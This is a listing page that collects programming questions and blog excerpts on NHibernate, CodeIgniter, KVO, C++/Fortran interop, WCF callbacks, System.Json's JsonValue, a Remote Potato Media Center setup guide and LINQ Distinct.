  • How to select chosen columns from two different entities into one DTO using NHibernate?

    - by Pawel Krakowiak
    I have two classes (just recreating the problem): public class User { public virtual int Id { get; set; } public virtual string FirstName { get; set; } public virtual string LastName { get; set; } public virtual IList<OrgUnitMembership> OrgUnitMemberships { get; set; } } public class OrgUnitMembership { public virtual int UserId { get; set; } public virtual int OrgUnitId { get; set; } public virtual DateTime JoinDate { get; set; } public virtual DateTime LeaveDate { get; set; } } There's a Fluent NHibernate map for both, of course: public class UserMapping : ClassMap<User> { public UserMapping() { Table("Users"); Id(e => e.Id).GeneratedBy.Identity(); Map(e => e.FirstName); Map(e => e.LastName); HasMany(x => x.OrgUnitMemberships) .KeyColumn(TypeReflector<OrgUnitMembership> .GetPropertyName(p => p.UserId)).ReadOnly().Inverse(); } } public class OrgUnitMembershipMapping : ClassMap<OrgUnitMembership> { public OrgUnitMembershipMapping() { Table("OrgUnitMembership"); CompositeId() .KeyProperty(x=>x.UserId) .KeyProperty(x=>x.OrgUnitId); Map(x => x.JoinDate); Map(x => x.LeaveDate); References(oum => oum.OrgUnit) .Column(TypeReflector<OrgUnitMembership> .GetPropertyName(oum => oum.OrgUnitId)).ReadOnly(); References(oum => oum.User) .Column(TypeReflector<OrgUnitMembership> .GetPropertyName(oum => oum.UserId)).ReadOnly(); } } What I want to do is to retrieve some users based on criteria, but I would like to combine all columns from the Users table with some columns from the OrgUnitMemberships table, analogous to a SQL query: select u.*, m.JoinDate, m.LeaveDate from Users u inner join OrgUnitMemberships m on u.Id = m.UserId where m.OrgUnitId = :ouid I am totally lost; I tried many different options. Using a plain SQL query almost works, but because there are some nullable enums in the User class, AliasToBean fails to transform; otherwise, wrapping a SQL query would work like this: return Session .CreateSQLQuery(sql) .SetParameter("ouid", orgUnitId) .SetResultTransformer(Transformers.AliasToBean<UserDTO>()) .List<UserDTO>() I tried the code below as a test (a few different variants), but I'm not sure what I'm doing. It works partially: I get instances of UserDTO back, and the properties coming from OrgUnitMembership (the dates) are filled, but all properties from User are null: User user = null; OrgUnitMembership membership = null; UserDTO dto = null; var users = Session.QueryOver(() => user) .SelectList(list => list .Select(() => user.Id) .Select(() => user.FirstName) .Select(() => user.LastName)) .JoinAlias(u => u.OrgUnitMemberships, () => membership) //.JoinQueryOver<OrgUnitMembership>(u => u.OrgUnitMemberships) .SelectList(list => list .Select(() => membership.JoinDate).WithAlias(() => dto.JoinDate) .Select(() => membership.LeaveDate).WithAlias(() => dto.LeaveDate)) .TransformUsing(Transformers.AliasToBean<UserDTO>()) .List<UserDTO>();


  • Codeigniter: Controller URI with Library

    - by Kevin Brown
    I have a working controller and library function, but I now need to pass a URI segment to the library for decision making, and I'm stuck. Controller: function survey($method) { $id = $this->session->userdata('id'); $data['member'] = $this->home_model->getUser($id); //Convert the db Object to a row array $data['manager'] = $data['member']->row(); $manager_id = $data['manager']->manager_id; $data['manager'] = $this->home_model->getUser($manager_id); $data['manager'] = $data['manager']->row(); if ($data['manager']->credits == '0') { flashMsg('warning',"You can't complete the assessment until your manager has purchased credit."); redirect('home','location'); } elseif ($data['manager']->test_complete == '3'){ flashMsg('warning',"You already completed the Assessment."); redirect('home','location'); } else{ $data['header'] = "Home"; $this->survey_form_processing->survey_form($this->_container,$data); } } Library: function survey_form($container) { if($method ==1){ $id = $this->CI->session->userdata('id'); // Setup fields for($i=1;$i<18;$i++){ $fields["a_".$i] = 'Question '.$i; } for($i=1;$i<17;$i++){ $fields["b_".$i] = 'Question '.$i; } $fields["company_name"] = "Company Name"; $fields['company_address'] = "company_address"; $fields['company_phone'] = "company_phone"; $fields['company_state'] = "company_state"; $fields['company_city'] = "company_city"; $fields['company_zip'] = "company_zip"; $fields['job_title'] = "job_title"; $fields['job_type'] = "job_type"; $fields['job_time'] = "job_time"; $fields['department'] = "department"; $fields['supervisor'] = "supervisor"; $fields['vision'] = "vision"; $fields['height'] = "height"; $fields['weight'] = "weight"; $fields['hand_dominance'] = "hand_dominance"; $fields['areas_of_fatigue'] = "areas_of_fatigue"; $fields['injury_review'] = "injury_review"; $fields['job_positive'] = "job_positive"; $fields['risk_factors'] = "risk_factors"; $fields['job_improvement_short'] = "job_improvement_short"; $fields['job_improvement_long'] = "job_improvement_long"; $fields["c_1"] = "Near Lift"; $fields["c_2"] = "Middle Lift"; $fields["c_3"] = "Far Lift"; $this->CI->validation->set_fields($fields); // Set Rules for($i=1;$i<18;$i++){ $rules["a_".$i]= 'hour|integer|max_length[2]'; } for($i=1;$i<17;$i++){ $rules["b_".$i]= 'hour|integer|max_length[2]'; } // Setup form default values $this->CI->validation->set_rules($rules); if ( $this->CI->validation->run() === FALSE ) { // Output any errors $this->CI->validation->output_errors(); } else { // Submit form $this->_submit(); } // Modify form, first load $this->CI->db->from('be_user_profiles'); $this->CI->db->where('user_id' , $id); $user = $this->CI->db->get(); $this->CI->db->from('be_survey'); $this->CI->db->where('user_id' , $id); $survey = $this->CI->db->get(); $user = array_merge($user->row_array(),$survey->row_array()); $this->CI->validation->set_default_value($user); // Display page $data['user'] = $user; $data['header'] = 'Risk Assessment Survey'; $data['page'] = $this->CI->config->item('backendpro_template_public') . 'form_survey'; $this->CI->load->view($container,$data); } else{ redirect('home','location'); } } My library function doesn't know what to do with Method...and I'm confused. Does it have something to do with instances in my library?


  • How to debug KVO

    - by user8472
    In my program I use KVO manually to observe changes to values of object properties. I receive an EXC_BAD_ACCESS signal at the following line of code inside a custom setter: [self willChangeValueForKey:@"mykey"]; The weird thing is that this happens when a factory method calls the custom setter and there should not be any observers around. I do not know how to debug this situation. Update: The way to list all registered observers is observationInfo. It turned out that there was indeed an object listed that points to an invalid address. However, I have no idea at all how it got there. Update 2: Apparently, the same object and method callback can be registered several times for a given object - resulting in identical entries in the observed object's observationInfo. When removing the registration only one of these entries is removed. This behavior is a little counter-intuitive (and it certainly is a bug in my program to add multiple entries at all), but this does not explain how spurious observers can mysteriously show up in freshly allocated objects (unless there is some caching/reuse going on that I am unaware of). Modified question: How can I figure out WHERE and WHEN an object got registered as an observer? Update 3: Specific sample code. ContentObj is a class that has a dictionary as a property named mykey. It overrides: + (BOOL)automaticallyNotifiesObserversForKey:(NSString *)theKey { BOOL automatic = NO; if ([theKey isEqualToString:@"mykey"]) { automatic = NO; } else { automatic=[super automaticallyNotifiesObserversForKey:theKey]; } return automatic; } A couple of properties have getters and setters as follows: - (CGFloat)value { return [[[self mykey] objectForKey:@"value"] floatValue]; } - (void)setValue:(CGFloat)aValue { [self willChangeValueForKey:@"mykey"]; [[self mykey] setObject:[NSNumber numberWithFloat:aValue] forKey:@"value"]; [self didChangeValueForKey:@"mykey"]; } The container class has a property contents of class NSMutableArray which holds instances of class ContentObj. It has a couple of methods that manually handle registrations: + (BOOL)automaticallyNotifiesObserversForKey:(NSString *)theKey { BOOL automatic = NO; if ([theKey isEqualToString:@"contents"]) { automatic = NO; } else { automatic=[super automaticallyNotifiesObserversForKey:theKey]; } return automatic; } - (void)observeContent:(ContentObj *)cObj { [cObj addObserver:self forKeyPath:@"mykey" options:0 context:NULL]; } - (void)removeObserveContent:(ContentObj *)cObj { [cObj removeObserver:self forKeyPath:@"mykey"]; } - (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object change:(NSDictionary *)change context:(void *)context { if (([keyPath isEqualToString:@"mykey"]) && ([object isKindOfClass:[ContentObj class]])) { [self willChangeValueForKey:@"contents"]; [self didChangeValueForKey:@"contents"]; } } There are several methods in the container class that modify contents. They look as follows: - (void)addContent:(ContentObj *)cObj { [self willChangeValueForKey:@"contents"]; [self observeDatum:cObj]; [[self contents] addObject:cObj]; [self didChangeValueForKey:@"contents"]; } And a couple of others that provide similar functionality to the array. They all work by adding/removing themselves as observers. Obviously, anything that results in multiple registrations is a bug and could sit somewhere hidden in these methods. My question targets strategies on how to debug this kind of situation. 
Alternatively, please feel free to provide an alternative strategy for implementing this kind of notification/observer pattern.


  • Associating an Object with other Objects and Properties of those Objects

    - by alzoid
    I am looking for some help with designing some functionality in my application. I already have something similar designed, but this problem is a little different. Background: In my application we have different Modules. Data in each module can be associated to other modules. Each Module is represented by an Object in our application. Module 1 can be associated with Module 2 and Module 3. Currently I use a factory to provide the proper DAO for getting and saving this data. It looks something like this: class Module1Factory { public static Module1BridgeDAO createModule1BridgeDAO(int moduleId) { switch (moduleId) { case Module.Module2Id: return new Module1_Module2DAO(); case Module.Module3Id: return new Module1_Module3DAO(); default: return null; } } } Module1_Module2 and Module1_Module3 implement the same BridgeModule interface. In the database I have a Table for every module (Module1, Module2, Module3). I also have a bridge table for each module (they are many-to-many): Module1_Module2, Module1_Module3, etc. The DAO basically handles all code needed to manage the association and retrieve its own instance data for the calling module. Now when we add new modules that associate with Module1, we simply implement the ModuleBridge interface and provide the common functionality. New Development We are adding a new module that will have the ability to be associated with other Modules as well as specific properties of those Modules. The module is basically providing the user the ability to add their custom forms to our other modules. That way they can collect additional information along with what we provide. I want to start associating my Form module with other modules and their properties. I.e., if Module1 has a property Category, I want to associate an instance of Form data with that property. There are many Forms. If a user creates an instance of Module2, they may always want certain form(s) attached to that Module2 instance. If they create an instance of Module2 and select Category 1, then I may want additional Form(s) created. I prototyped something like this: Form FormLayout (contains the labels and GUI controls) FormModule (associates a form with all instances of a module) FormInstance (an instance of a form to be filled out) As I thought about it, I was thinking about making a new FormModule table/class/DAO for each Module and Property that I add. So I might have: FormModule1 FormModule1Property1 FormModule1Property2 FormModule1Property3 FormModule1Property4 FormModule2 FormModule3 FormModule3Property1 Then, as I did previously, I would use a factory to get the proper DAO for dealing with all of these. I would hand it an array of ids representing different modules and properties, and it would return all of the DAOs that I need to call getForms() on, which in turn would return all of the forms for that particular bridge. Some points: This will be for a new module, so I don't need to expand on the factory code I provided; I just wanted to show an example of what I have done in the past. The new module can be associated with: other Modules (i.e. globally, for any instance of that module's data), or other module properties (i.e. only if the Module instance has a certain value in one of its properties). I want to make it easy for developers to add associations with other modules and properties. Can anyone suggest any design patterns or strategies for achieving this? If anything is unclear please let me know. Thank you, Al
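    One concrete shape for that: replace the growing switch statement with a registry keyed by (module id, property id), so adding a new bridge means registering a class rather than editing the factory. A short illustrative sketch in Python - every name here is hypothetical:

        # Registry mapping (module_id, property_id) -> DAO class;
        # property_id of None means "associated with the module globally".
        BRIDGE_DAOS = {}

        def register_bridge(module_id, property_id=None):
            def decorator(cls):
                BRIDGE_DAOS[(module_id, property_id)] = cls
                return cls
            return decorator

        @register_bridge(module_id=2)  # forms attached to every Module2 instance
        class FormModule2DAO:
            def get_forms(self):
                return ["intake-form"]

        @register_bridge(module_id=1, property_id="Category")  # tied to a property value
        class FormModule1CategoryDAO:
            def get_forms(self):
                return ["category-form"]

        def daos_for(associations):
            """Return DAO instances for the requested (module_id, property_id) pairs."""
            return [BRIDGE_DAOS[key]() for key in associations if key in BRIDGE_DAOS]

        # usage: forms = [f for dao in daos_for([(2, None), (1, "Category")])
        #                 for f in dao.get_forms()]

    The same idea ports directly to the existing factory: a static map from (moduleId, propertyId) to a DAO constructor, populated at startup, replaces the switch.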


  • C++ class functions calling a Fortran subroutine

    - by user2863626
    Okay, so I am trying to make my code work. It is a simple C++ program with a class "CArray". This class has 2 properties: the array size, and the values. I want the main C++ program to create two instances of the class CArray. In the class CArray, I have a function called "AddArray( CArray )" which adds another array to the current array. The problem I am stuck with is that I want the function "AddArray" to add the two arrays in Fortran. I know, much more complicated, but that is what I need. I am having issues with linking the two inside the class code. #include <iostream> using namespace std; class CArray { public: CArray(); ~CArray(); int Size; int* Val; void SetSize( int ); void SetValues(); void GetArray(); extern "C" { void Add( int*, int*, int*, int*); void Subtract( int*, int*, int*, int*); void Muliply( int*, int*, int *, int* ); } void AddArray( CArray ); void SubtractArray( CArray ); void MultiplyArray( CArray ); }; Also here is the CArray function file. #include "Array.h" #include <iostream> using namespace std; CArray::CArray() { } CArray::~CArray() { } void CArray::SetSize( int s ) { Size = s; for ( int i=0; i<s; i++ ) { Val = new int[Size]; } } void CArray::SetValues() { for ( int i=0; i<Size; i++ ) { cout << "Element " << i+1 << ": "; cin >> Val[i]; } } void CArray::GetArray() { for ( int i=0; i<Size; i++ ) { cout << Val[i] << " "; } } void CArray::AddArray( CArray a ) { if ( Size == a.Size ) { Add(&Val, &a.Val); } else { cout << "Array dimensions do not agree!" << endl; } } void CArray::SubtractArray( CArray a ) { Subtract( &Val, &a, &Size, &a.Size); GetArray(); } Here is my Fortran code. module SubtractArrays use iso_c_binding implicit none contains subroutine Subtract(a,b,s1,s2) bind(c,name='Subtract') integer s1,s2 integer a(s1),b(s2) integer i if ( s1.eq.s2 ) then do i=1,s1 a(i) = a(i) - b(i) end do end if end subroutine end module If someone could just help me with setting me up to send arrays of integers from C++ classes to Fortran I would greatly appreciate it! Thank you, Josh Derrick


  • Serious problem with WCF, GridViews, Callbacks and ExecuteReader exceptions

    - by barjed
    Hi, I have this problem that is driving me insane. I have a project to deliver before Thursday. Basically, it's an app consisting of three components that communicate with each other via WCF. I have one console app and one Windows Forms app. The console app is a server that's connected to the database. You can add records to it via the Windows Forms client that connects with the server through WCF. The code for the client: namespace BankAdministratorClient { [CallbackBehavior(ConcurrencyMode = ConcurrencyMode.Single, UseSynchronizationContext = false)] public partial class Form1 : Form, BankServverReference.BankServerCallback { private BankServverReference.BankServerClient server = null; private SynchronizationContext interfaceContext = null; public Form1() { InitializeComponent(); interfaceContext = SynchronizationContext.Current; server = new BankServverReference.BankServerClient(new InstanceContext(this), "TcpBinding"); server.Open(); server.Subscribe(); refreshGridView(""); } public void refreshClients(string s) { SendOrPostCallback callback = delegate(object state) { refreshGridView(s); }; interfaceContext.Post(callback, s); } public void refreshGridView(string s) { try { userGrid.DataSource = server.refreshDatabaseConnection().Tables[0]; } catch (Exception ex) { MessageBox.Show(ex.ToString()); } } private void buttonAdd_Click(object sender, EventArgs e) { server.addNewAccount(Int32.Parse(inputPIN.Text), Int32.Parse(inputBalance.Text)); } private void Form1_FormClosing(object sender, FormClosingEventArgs e) { try { server.Unsubscribe(); server.Close(); }catch{} } } } The code for the server: namespace SSRfinal_tcp { class Program { static void Main(string[] args) { Console.WriteLine(MessageHandler.dataStamp("The server is starting up")); using (ServiceHost server = new ServiceHost(typeof(BankServer))) { server.Open(); Console.WriteLine(MessageHandler.dataStamp("The server is running")); Console.ReadKey(); } } } [ServiceBehavior(ConcurrencyMode = ConcurrencyMode.Single, InstanceContextMode = InstanceContextMode.PerCall, IncludeExceptionDetailInFaults = true)] public class BankServer : IBankServerService { private static DatabaseLINQConnectionDataContext database = new DatabaseLINQConnectionDataContext(); private static List<IBankServerServiceCallback> subscribers = new List<IBankServerServiceCallback>(); public void Subscribe() { try { IBankServerServiceCallback callback = OperationContext.Current.GetCallbackChannel<IBankServerServiceCallback>(); if (!subscribers.Contains(callback)) subscribers.Add(callback); Console.WriteLine(MessageHandler.dataStamp("A new Bank Administrator has connected")); } catch { Console.WriteLine(MessageHandler.dataStamp("A Bank Administrator has failed to connect")); } } public void Unsubscribe() { try { IBankServerServiceCallback callback = OperationContext.Current.GetCallbackChannel<IBankServerServiceCallback>(); if (subscribers.Contains(callback)) subscribers.Remove(callback); Console.WriteLine(MessageHandler.dataStamp("A Bank Administrator has been signed out from the connection list")); } catch { Console.WriteLine(MessageHandler.dataStamp("A Bank Administrator has failed to sign out from the connection list")); } } public DataSet refreshDatabaseConnection() { var q = from a in database.GetTable<Account>() select a; DataTable dt = q.toTable(rec => new object[] { q }); DataSet data = new DataSet(); data.Tables.Add(dt); Console.WriteLine(MessageHandler.dataStamp("A Bank Administrator has requested a database data listing refresh")); return data; } public
    void addNewAccount(int pin, int balance) { Account acc = new Account() { PIN = pin, Balance = balance, IsApproved = false }; database.Accounts.InsertOnSubmit(acc); database.SubmitChanges(); database.addNewAccount(pin, balance, false); subscribers.ForEach(delegate(IBankServerServiceCallback callback) { callback.refreshClients("New operation is pending approval."); }); } } } This is really simple and it works for a single window. However, when you open multiple instances of the client window and try to add a new record, the window performing the insert operation crashes with an ExecuteReader error: "ExecuteReader requires an open and available Connection. The connection's current state is Connecting." I have no idea what's going on. Please advise.


  • Dynamic JSON Parsing in .NET with JsonValue

    - by Rick Strahl
    So System.Json has been around for a while in Silverlight, but it's relatively new for the desktop .NET framework and now moving into the lime-light with the pending release of ASP.NET Web API which is bringing a ton of attention to server side JSON usage. The JsonValue, JsonObject and JsonArray objects are going to be pretty useful for Web API applications as they allow you dynamically create and parse JSON values without explicit .NET types to serialize from or into. But even more so I think JsonValue et al. are going to be very useful when consuming JSON APIs from various services. Yes I know C# is strongly typed, why in the world would you want to use dynamic values? So many times I've needed to retrieve a small morsel of information from a large service JSON response and rather than having to map the entire type structure of what that service returns, JsonValue actually allows me to cherry pick and only work with the values I'm interested in, without having to explicitly create everything up front. With JavaScriptSerializer or DataContractJsonSerializer you always need to have a strong type to de-serialize JSON data into. Wouldn't it be nice if no explicit type was required and you could just parse the JSON directly using a very easy to use object syntax? That's exactly what JsonValue, JsonObject and JsonArray accomplish using a JSON parser and some sweet use of dynamic sauce to make it easy to access in code. Creating JSON on the fly with JsonValue Let's start with creating JSON on the fly. It's super easy to create a dynamic object structure. JsonValue uses the dynamic  keyword extensively to make it intuitive to create object structures and turn them into JSON via dynamic object syntax. Here's an example of creating a music album structure with child songs using JsonValue:[TestMethod] public void JsonValueOutputTest() { // strong type instance var jsonObject = new JsonObject(); // dynamic expando instance you can add properties to dynamic album = jsonObject; album.AlbumName = "Dirty Deeds Done Dirt Cheap"; album.Artist = "AC/DC"; album.YearReleased = 1977; album.Songs = new JsonArray() as dynamic; dynamic song = new JsonObject(); song.SongName = "Dirty Deeds Done Dirt Cheap"; song.SongLength = "4:11"; album.Songs.Add(song); song = new JsonObject(); song.SongName = "Love at First Feel"; song.SongLength = "3:10"; album.Songs.Add(song); Console.WriteLine(album.ToString()); } This produces proper JSON just as you would expect: {"AlbumName":"Dirty Deeds Done Dirt Cheap","Artist":"AC\/DC","YearReleased":1977,"Songs":[{"SongName":"Dirty Deeds Done Dirt Cheap","SongLength":"4:11"},{"SongName":"Love at First Feel","SongLength":"3:10"}]} The important thing about this code is that there's no explicitly type that is used for holding the values to serialize to JSON. I am essentially creating this value structure on the fly by adding properties and then serialize it to JSON. This means this code can be entirely driven at runtime without compile time restraints of structure for the JSON output. Here I use JsonObject() to create a new object and immediately cast it to dynamic. JsonObject() is kind of similar in behavior to ExpandoObject in that it allows you to add properties by simply assigning to them. Internally, JsonValue/JsonObject these values are stored in pseudo collections of key value pairs that are exposed as properties through the DynamicObject functionality in .NET. 
    The syntax gets a little tedious only if you need to create child objects or arrays that have to be explicitly defined first. Other than that, the syntax looks like normal object access syntax. Always remember though these values are dynamic - which means no Intellisense and no compiler type checking. It's up to you to ensure that the values you create are accessed consistently and without typos in your code. Note that you can also access the JsonValue instance directly and get access to the underlying type. This means you can assign properties by string, which can be useful for fully data-driven JSON generation from other structures. Below you can see both styles of access next to each other:// strong type instance var jsonObject = new JsonObject(); // you can explicitly add values here jsonObject.Add("Entered", DateTime.Now); // expando style instance you can just 'use' properties dynamic album = jsonObject; album.AlbumName = "Dirty Deeds Done Dirt Cheap"; JsonValue internally stores property keys and values in collections and you can iterate over them at runtime. You can also manipulate the collections if you need to, to get the object structure to look exactly like you want. Again, if you've used ExpandoObject before, JsonObject/Value are very similar in the behavior of the structure. Reading JSON strings into JsonValue The JsonValue structure supports importing JSON via the Parse() and Load() methods, which can read JSON data from a string or various streams respectively. Essentially JsonValue includes the core JSON parsing to turn a JSON string into a collection of JsonValue objects that can then be referenced using familiar dynamic object syntax. Here's a simple example:[TestMethod] public void JsonValueParsingTest() { var jsonString = @"{""Name"":""Rick"",""Company"":""West Wind"",""Entered"":""2012-03-16T00:03:33.245-10:00""}"; dynamic json = JsonValue.Parse(jsonString); // values require casting string name = json.Name; string company = json.Company; DateTime entered = json.Entered; Assert.AreEqual(name, "Rick"); Assert.AreEqual(company, "West Wind"); } The JSON string represents an object with three properties which is parsed into a JsonValue object and cast to dynamic. Once cast to dynamic I can then go ahead and access the object using familiar object syntax. Note that the actual values - json.Name, json.Company, json.Entered - are actually of type JsonPrimitive and I have to assign them to their appropriate types first before I can do type comparisons. The dynamic properties will automatically cast to the right type expected as long as the compiler can resolve the type of the assignment or usage. The AreEqual() method doesn't, as it expects two object instances, and comparing json.Company to "West Wind" is comparing two different types (JsonPrimitive to String), which fails. So the intermediary assignment is required to make the test pass. The JSON structure can be much more complex than this simple example.
Here's another example of an array of albums serialized to JSON and then parsed through with JsonValue():

[TestMethod]
public void JsonArrayParsingTest()
{
    var jsonString = @"[
{
    ""Id"": ""b3ec4e5c"",
    ""AlbumName"": ""Dirty Deeds Done Dirt Cheap"",
    ""Artist"": ""AC/DC"",
    ""YearReleased"": 1977,
    ""Entered"": ""2012-03-16T00:13:12.2810521-10:00"",
    ""AlbumImageUrl"": ""http://ecx.images-amazon.com/images/I/61kTaH-uZBL._AA115_.jpg"",
    ""AmazonUrl"": ""http://www.amazon.com/gp/product/B00008BXJ4/ref=as_li_ss_tl?ie=UTF8&tag=westwindtechn-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B00008BXJ4"",
    ""Songs"": [
        { ""AlbumId"": ""b3ec4e5c"", ""SongName"": ""Dirty Deeds Done Dirt Cheap"", ""SongLength"": ""4:11"" },
        { ""AlbumId"": ""b3ec4e5c"", ""SongName"": ""Love at First Feel"", ""SongLength"": ""3:10"" },
        { ""AlbumId"": ""b3ec4e5c"", ""SongName"": ""Big Balls"", ""SongLength"": ""2:38"" }
    ]
},
{
    ""Id"": ""67280fb8"",
    ""AlbumName"": ""Echoes, Silence, Patience & Grace"",
    ""Artist"": ""Foo Fighters"",
    ""YearReleased"": 2007,
    ""Entered"": ""2012-03-16T00:13:12.2810521-10:00"",
    ""AlbumImageUrl"": ""http://ecx.images-amazon.com/images/I/41mtlesQPVL._SL500_AA280_.jpg"",
    ""AmazonUrl"": ""http://www.amazon.com/gp/product/B000UFAURI/ref=as_li_ss_tl?ie=UTF8&tag=westwindtechn-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B000UFAURI"",
    ""Songs"": [
        { ""AlbumId"": ""67280fb8"", ""SongName"": ""The Pretender"", ""SongLength"": ""4:29"" },
        { ""AlbumId"": ""67280fb8"", ""SongName"": ""Let it Die"", ""SongLength"": ""4:05"" },
        { ""AlbumId"": ""67280fb8"", ""SongName"": ""Erase/Replay"", ""SongLength"": ""4:13"" }
    ]
},
{
    ""Id"": ""7b919432"",
    ""AlbumName"": ""End of the Silence"",
    ""Artist"": ""Henry Rollins Band"",
    ""YearReleased"": 1992,
    ""Entered"": ""2012-03-16T00:13:12.2800521-10:00"",
    ""AlbumImageUrl"": ""http://ecx.images-amazon.com/images/I/51FO3rb1tuL._SL160_AA160_.jpg"",
    ""AmazonUrl"": ""http://www.amazon.com/End-Silence-Rollins-Band/dp/B0000040OX/ref=sr_1_5?ie=UTF8&qid=1302232195&sr=8-5"",
    ""Songs"": [
        { ""AlbumId"": ""7b919432"", ""SongName"": ""Low Self Opinion"", ""SongLength"": ""5:24"" },
        { ""AlbumId"": ""7b919432"", ""SongName"": ""Grip"", ""SongLength"": ""4:51"" }
    ]
}
]";

    dynamic albums = JsonValue.Parse(jsonString);

    foreach (dynamic album in albums)
    {
        Console.WriteLine(album.AlbumName + " (" + album.YearReleased.ToString() + ")");

        foreach (dynamic song in album.Songs)
        {
            Console.WriteLine("\t" + song.SongName);
        }
    }

    Console.WriteLine(albums[0].AlbumName);
    Console.WriteLine(albums[0].Songs[1].SongName);
}

It's pretty sweet how easy it becomes to parse even complex JSON and then just run through the object using object syntax, yet without an explicit type in the mix. In fact it looks and feels a lot like using JavaScript to parse through this data, doesn't it? And that's the point…

© Rick Strahl, West Wind Technologies, 2005-2012
Posted in .NET  Web Api  JSON

    Read the article

  • Remotely Schedule and Stream Recorded TV in Windows 7 Media Center

    - by DigitalGeekery
Have you ever been away from home and suddenly realized you forgot to record your favorite program? Now Windows 7 Media Center users can schedule recordings remotely from their phones or mobile devices with Remote Potato.

How it Works

Remote Potato installs server software on the host computer running Windows 7 Media Center. Once the software is installed, we'll need to do some port forwarding on the router and set up an optional dynamic DNS address. When setup is completed, we will access the application through a web-based interface. Silverlight is required for streaming recorded TV, but scheduling recordings can be done through an HTML interface.

Installing Remote Potato

Download and install Remote Potato on the Media Center PC. (See download link below) If you plan to stream any recorded TV, you'll also want to install the streaming pack located on the same page. It isn't required to stream all shows, only shows that require the AC3 audio codec. Click Yes to allow Remote Potato to add rules to the Windows Firewall for remote access. You'll likely need to accept a few UAC prompts. When notified that the rules were added, click OK. Remote Potato will then prompt you to allow administrator privileges to reserve a URL for its web server. Click Yes. The Remote Potato server will start. Click on the configuration button at the right to reveal the settings tabs. On the General tab, you'll have the option to run Remote Potato on startup and minimized in the system tray. If you're running Media Center on a dedicated HTPC, you'll probably want to enable both startup options.

Forwarding Ports on Your Router

You'll need to forward a couple of ports on your router. By default, these will be ports 9080 and 9081. In this example we're using a Linksys WRT54GL router; however, the steps for port forwarding will vary from router to router. On the Linksys configuration page, click on the Applications & Gaming tab, and then the Port Range Forward tab. Under Application, type in a name of your choosing. In both the Start and End boxes, type the port number 9080. Enter the local IP address of your Media Center computer in the IP address column. Click the check box under Enable. Repeat the process on the next line, but this time use port 9081. When finished, click the Save Settings button. Note: It's highly recommended that you configure the home computer running Media Center & Remote Potato with a static IP address.

Find your IP Address

You'll need to find the IP address assigned to your router by your ISP. There are many ways to do this, but a quick and easy way is to visit a site like checkip.dyndns.org (link available below). The current external IP address of your router will be displayed in the browser.

Dynamic DNS

This is an optional step, but it's highly recommended. Many routers, such as the Linksys WRT54GL we are using, support Dynamic DNS (DDNS). What Dynamic DNS allows you to do is associate your home router's external IP address with a domain name. Every time your home router is assigned a new IP address by your ISP, the domain name is updated to point to your new IP address. Remote Potato's user interface is accessed over the Internet by connecting to your router's IP address followed by a colon and the port number.
(Ex: XXX.XXX.XXX.XXX:9080) Instead of constantly having to look up and remember an IP address, you can use DDNS along with a third-party provider like DynDNS.com to sign up for a free domain name and configure it to be updated each time your router is assigned a new IP address. Go to the DynDNS.com website (see link at the end of the article) and sign up for a free domain name. You'll need to register and confirm by email. Once you've signed in and selected your domain name, click Activate Services. You'll get a confirmation message that your domain name has been activated. On the Linksys WRT54GL, click on the Setup tab and then DDNS. Select DynDNS.org, or TZO.com if you prefer to use their service, from the drop-down list. With DynDNS, you'll need to fill in the username and password you signed up with at the DynDNS website and the hostname you chose. Note: You can connect over your local network with the IP address of the computer running Remote Potato followed by a colon and the port number. Ex: 192.168.1.2:9080

Logging in to Remote Potato and Recording a Show

Once you connect, you'll see the start page. To view the TV listings, click on TV Guide. You'll then see your guide listings. There are a few ways to navigate the listings. At the top left, you can click on any of the preset time buttons to jump to the listings at that time of the day. Click on the arrows to the right and left of the day and date at the top center to proceed to the previous or next day. Or, jump to a specific day with the day and date buttons at the top right. To set up a recording, click on a program. You can choose to record the individual show or the entire series by clicking on Record Show or Record Series.

Remote Potato on Mobile Devices

Perhaps the coolest feature of Remote Potato is the ability to schedule recordings from your phone or mobile device. Note: For any devices or computers without Silverlight, you will be prompted to view the HTML page. Select Browse Listings. Select your program to record. In the Program Details, select Record Show to record the single episode or Record Series to record all instances of the series. You will then see a red dot on the program listing to indicate that the show is scheduled for recording.

Streaming Recorded TV

Click on Recorded TV from the home screen to access your previously recorded TV programs. Click on the selection you wish to stream. Click on Play. If you receive an error message at this point, you'll need to install the streaming pack for Remote Potato. This is found on the same download page as the installation files. (See link below) The Begin from slider allows you to start playback from the start (by default) or from a different point in the program by moving the slider. The Quality (bitrate) setting allows you to choose the quality of the playback. We found the video quality on the Normal setting to be pretty lousy, and Low was just pointless. High was the best overall viewing experience, as it provided smooth, quality video playback. We experienced significant stuttering during playback using the Ultra High setting. Click Start when you are ready to begin. When playback begins you'll see a slider at the top right. Move the slider left or right to increase or decrease the size of the video. There's also a button to switch to full screen. Media Center users who travel frequently or are always on the go will likely find Remote Potato to be a blessing. Since Remote Potato was released earlier this year, updates have come fast and furious.
The latest beta release includes support for streaming music and photos. If you like those nice network TV logos, check out our article on adding TV channel logos to Windows Media Center.

Downloads and Links

Download Remote Potato and Streaming Pack
Find your IP address
Sign Up for a Domain Name at DynDNS.com

    Read the article

  • Using LINQ Distinct: With an Example on ASP.NET MVC SelectListItem

    - by Joe Mayo
One of the things that might be surprising about the LINQ Distinct standard query operator is that it doesn't automatically work properly on custom classes. There are reasons for this, which I'll explain shortly. The example I'll use in this post focuses on pulling a unique list of names to load into a drop-down list. I'll explain the sample application, show you a typical first shot at Distinct, explain why it won't work as you expect, and then demonstrate a solution to make Distinct work with any custom class. The technologies I'm using are LINQ to Twitter, LINQ to Objects, Telerik Extensions for ASP.NET MVC, ASP.NET MVC 2, and Visual Studio 2010. The function of the example program is to show a list of people that I follow. In Twitter API vernacular, these people are called "Friends", though I've never met most of them in real life. This is part of the ubiquitous language of social networking, and Twitter in particular, so you'll see my objects named accordingly. Distinct comes into play because I want a drop-down list with the names of the friends appearing in the list. Some friends are quite verbose, which means I can't just extract names from each tweet and populate the drop-down; otherwise, I would end up with many duplicate names. Therefore, Distinct is the appropriate operator to eliminate the extra entries from my friends who tend to be enthusiastic tweeters. The sample doesn't do anything with the drop-down list, and I leave its practical purpose up to your imagination; perhaps a filter for the list if I only want to see a certain person's tweets, or maybe a quick list that I plan to combine with a TextBox and Button to reply to a friend. When the program runs, you'll need to authenticate with Twitter, because I'm using OAuth (DotNetOpenAuth) for authentication, and then you'll see the drop-down list of names above the grid with the most recent tweets from friends. Here's what the application looks like when it runs: As you can see, there is a drop-down list above the grid. The drop-down list is where most of the focus of this article will be. 